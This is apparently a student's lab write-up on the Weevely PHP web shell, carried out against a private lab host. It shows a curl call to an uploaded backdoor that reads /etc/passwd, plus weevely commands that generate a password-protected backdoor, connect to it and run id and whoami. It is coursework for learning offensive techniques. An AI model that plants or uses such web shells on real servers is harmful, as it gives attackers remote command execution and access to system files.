Lab 8.1 Weevely

• Caputure filter used for deliverable 1

# Wireshark open on wg0
curl 'http://10.0.5.25/upload/simple-backdoor.php?cmd=cat+/etc/passwd'

---

• Deliverable 2 required uploading the simple-backdoor.php from previous labs into pippin. Once that's all set. Make sure to curl before doing the following

weevely generate pass /home/champuser/webshells/eric-backdoor.php
weevely http://10.0.5.25/upload/eric-backdoor.php pass

# Weevely opens
id
whoami

• Ensure you curl before doing weevely as I had an issue where it wouldn't fully work and had to try a few times.

Reflection

This lab was fairly simple just required a few attempts at deliverable 2 just to ensure everything was working properly.